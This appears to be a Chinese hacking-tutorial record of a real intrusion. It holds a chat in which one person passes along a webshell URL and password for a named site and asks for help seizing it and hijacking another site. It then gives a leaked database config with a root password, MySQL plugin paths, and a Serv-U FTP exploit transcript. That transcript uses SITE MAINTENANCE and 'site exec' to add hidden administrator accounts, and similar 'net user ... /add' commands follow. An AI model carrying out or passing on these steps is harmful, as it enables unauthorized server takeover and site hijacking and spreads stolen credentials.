╭──────────────────────────╮
  猫客工作室--真诚、高效、创新，敢想敢做努力做到最好！ 
╰──────────────────────────╯

>讲师名称：剑眉大侠（QQ767501681）

>动画名称：实战提权朋友（憔悴）给的shell


憔悴 10:55:36 
http://www.xianysw.com/1.php 密码c  能提权吗？
剑眉大侠 13:53:25 
你搞不定么
憔悴 13:53:40 
不会提权
憔悴 13:54:01 
能拿下来吗？我只劫持一个站！
憔悴 13:54:18 
其他我不要！
剑眉大侠 13:54:22 
一会我试试
憔悴 13:54:34 
谢了呀！
憔悴 13:54:58 
mysql提权不知道为什么不成功 自己对提权还是不行啊！
憔悴 13:55:18 
没天赋呀！还是研究怎么拿webshell去！
剑眉大侠 13:55:40 
嗯
剑眉大侠 13:56:15 
很多时候是版本问题 5.0以上就基本要用mof提权了
剑眉大侠 13:56:22 
要么就是路径没有写入权限
剑眉大侠 13:56:28 
再就是root被降权了
憔悴 13:57:09 
没研究过提权！
憔悴 13:57:46 
拿下之后你帮我劫持凡客卡盟 
憔悴 13:57:52 
www.fankekm.com
剑眉大侠 13:58:22 
好
憔悴 13:58:42 
只要带上我就好了
剑眉大侠 13:58:48 
嗯



<?php
//数据库连接信息
$cfg_dbhost = 'localhost';
$cfg_dbname = 'dedecmsv57gbksp1';
$cfg_dbuser = 'root';
$cfg_dbpwd = 'tytykou';
$cfg_dbprefix = 'dede_';
$cfg_db_language = 'gbk';

5.5.19
?>

C:\PHPWIN\PHPWEB\MySQL Server 5.5\lib/plugin/mysqlDLL.dll


开放端口 ---> 43958
开放端口 ---> 3389

返回数据包: 220 Serv-U FTP Server v6.4 for WinSock ready... 
发送数据包: USER LocalAdministrator 
返回数据包: 331 User name okay, need password. 
发送数据包: PASS #l@$ak#.lk;0@P 
返回数据包: 230 User logged in, proceed. 
发送数据包: SITE MAINTENANCE 

返回数据包: 900-Type=Status 
返回数据包: 220 Serv-U FTP Server v6.4 for WinSock ready... 
发送数据包: USER ln$ 
返回数据包: 331 User name okay, need password. 
发送数据包: PASS 123456 
返回数据包: 230 User logged in, proceed. 
发送数据包: site exec net user jianmei daxia.asd /add & net localgroup administrators jianmei /add 
返回数据包: 200 EXEC command successful (TID=33). 
发送数据包: -DELETEDOMAIN -IP=0.0.0.0 PortNo=21 
返回数据包: 900 Server=Online 

net user jianmei daxia.asd123/*- /add & net localgroup administrators jianmei /add

?Terminal Service端口为:3389

?默认管理员用户名为:administrator
tytykou

C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini

cmd /c net user jianmeidaxia jianmeidaxia.asd123 /add & net localgroup administrators jianmeidaxia /add

cmd /c net user kongqi$ 123456 /add & net localgroup administrators kongqi$ /add